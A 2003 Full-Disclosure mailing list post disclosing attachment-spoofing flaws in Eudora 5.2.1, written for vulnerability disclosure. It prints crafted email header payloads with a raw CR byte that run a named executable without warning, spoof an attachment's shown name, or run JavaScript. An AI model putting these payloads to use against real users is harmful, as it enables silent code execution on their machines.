[Full-Disclosure] Re: Eudora 5.2.1 attachment spoof

From: Paul Szabo (pszat_private)
Date: Mon May 26 2003 - 19:27:22 PDT

    Building on my Eudora attachment spoof

      http://www.securityfocus.com/archive/1/322286

    I have now found better games to play:

      From: me
      To: you

      Ensure victim has both attachments 'calc' and 'calc.exe' (sent in
      this, or previous, email). Then the following shows 'windows' icon
      and runs calc.exe without warning when clicked:
      Attachment Converted<CR>: attach\calc

    Other mis-features I found (but I do not see how to make them into a
    credible exploit):

      If we can guess the full path to the attach directory then can
      change the name shown to anything we like, but get broken icon:
      Attachment Converted<CR>: <A href=H:/windows/.eudora/attach/calc>file.txt</a>

      Javascript done with InternetExplorer even if we set own viewer:
      Attachment Converted<CR>: <A href=javascript:alert('hello')>hello.txt</a>

    Replace the four-character <CR> marker with the single byte CR=0x0d in all
    of above. Tested with Eudora 5.2.1 on Windows 2000.

    Cheers,

    Paul Szabo - pszat_private  http://www.maths.usyd.edu.au:8000/u/psz/
    School of Mathematics and Statistics  University of Sydney   2006  Australia
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html